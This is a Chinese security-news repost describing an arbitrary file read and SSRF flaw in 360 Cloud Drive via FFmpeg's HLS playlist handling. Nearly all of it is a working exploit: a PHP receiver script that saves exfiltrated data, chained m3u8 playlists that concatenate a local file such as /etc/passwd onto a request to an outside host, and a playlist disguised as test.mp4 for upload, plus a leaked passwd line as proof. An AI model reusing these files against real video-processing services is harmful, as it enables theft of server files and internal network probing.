频道栏目
首页 > 资讯 > 杀毒防毒 > 正文

360云盘文件读取/SSRF

16-05-10        来源:[db:作者]  
收藏   我要投稿

好像是FFmpeg分段读取的问题,然后自己动手测试.一共4个文件:comm.php (接收用的 也可以用监听一个端口)
file_put_contents(time()."_test.txt",$_GET['x']);
?>
header.m3u8 (视频格式文件)
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.u-url.org/exp/movie/comm.php?x=
remote.m3u8 (第二次转发的)
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com
#EXT-X-ENDLIST
http://baidu.com  也可以换成 本地资源文件: /etc/passwd
test.mp4 (最终上传触发)
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.u-url.org/exp/movie/remote.m3u8
#EXT-X-ENDLIST
一切准备号了之后就上传test.mp4到360云盘上去。

root:x:0:0:root:/root:/bin/bash
也可以ssrf
 

相关TAG标签
上一篇:安全预警:PHP zip组件整型溢出可远程命令执行
下一篇:如何黑掉 Telegram 以及 WhatsApp?
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站